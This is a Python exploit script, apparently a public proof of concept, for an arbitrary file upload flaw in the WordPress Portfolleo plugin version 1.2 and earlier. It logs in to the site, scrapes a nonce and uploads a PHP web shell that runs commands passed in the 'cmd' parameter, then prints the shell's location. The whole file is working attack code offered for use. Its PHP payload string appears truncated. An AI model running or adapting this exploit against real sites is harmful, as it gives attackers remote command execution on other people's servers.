import requests import time import argparse from bs4 import BeautifulSoup # Banner banner = """ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@ @@@ @@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@ @@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ @@!@! @@!@! @@! @@@ !@@ !@@ @@@ !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@!!@! !@!!@! !@! @!@ !@! !@! @!@ !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ @!! @!! @!@!@!@!@ @!! @!! !!@!!@!! !!@@!@! !!@@!! @!@!!@ !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: !!! !@! !!!@!@!!! !!! !@! !!@!!! @!!@!!!! @!!@!!! !!@!@! :!! :!: !!: !!: !:! !!:! !!! !:! :!!:!:!!: :!!:!:!!: !!! !:! !:! !:! !!: :!: ::!!:! :!: :!: :!: !:! :!: !:::!!::: !:::!!::: !:! :!: !:! !:! :!: ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: ::: ::: ::::: :: :::: ::: :::: :: :: :::: :: :: : : : :: :: :: : ::: : : : : :: : ::: ::: ::: : : : :: : : :: : : : : : By:Nxploited | Khaled Alenazi, """ print(banner) def parse_arguments(): parser = argparse.ArgumentParser(description="WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi") parser.add_argument('-u', '--url', required=True, help='Base URL of the site (e.g. http://192.168.100.74:888/wordpress)') parser.add_argument('-U', '--username', dest='username', required=True, help='WordPress username') parser.add_argument('-p', '--password', required=True, help='WordPress password') return parser.parse_args() def create_session(): session = requests.Session() requests.packages.urllib3.disable_warnings() session.verify = False return session def login(session, url, username, password): login_url = f"{url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'rememberme': 'forever', 'wp-submit': 'Log In' } response = session.post(login_url, data=login_data, headers={"User-Agent": "Mozilla/5.0"}) return response def check_login(session): return any('wordpress_logged_in' in cookie.name for cookie in session.cookies) def get_nonce(session, url, portfolio_path): portfolio_url = f"{url}/{portfolio_path}" response = session.get(portfolio_url, headers={"User-Agent": "Mozilla/5.0"}) soup = BeautifulSoup(response.text, 'html.parser') return soup.find('input', {'name': '_wpnonce'})['value'] def upload_shell(session, url, nonce, portfolio_path): shell_file = { 'fileupload': ('nxploit.php', '" . shell_exec($_GET["cmd"]) . ""; ?>', 'application/x-php') } form_data = { '_wpnonce': nonce, '_wp_http_referer': f'/{portfolio_path}', 'name': 'profile', 'dob': '23/03/2025', 'desc': 'Im Nxploited , Khaled Alenazi', 'action': 'update', 'page_options': 'name,dob,desc,datafile', 'submit': 'Add To Portfolio' } upload_url = f"{url}/wp-admin/options.php" response = session.post(upload_url, headers={"User-Agent": "Mozilla/5.0"}, files=shell_file, data=form_data) return response def main(): args = parse_arguments() session = create_session() response = login(session, args.url, args.username, args.password) if check_login(session): print("[+] Logged in successfully.") else: print("[-] Failed to log in.") exit() portfolio_path = "wp-admin/admin.php?page=portfolleo" nonce = get_nonce(session, args.url, portfolio_path) print(f"[+] Extracted _wpnonce: {nonce}") response = upload_shell(session, args.url, nonce, portfolio_path) print("[+] Shell has been uploaded.") print("[*] Check the shell here: {}/wp-content/portfolleo/nxploit.php".format(args.url)) if __name__ == "__main__": main()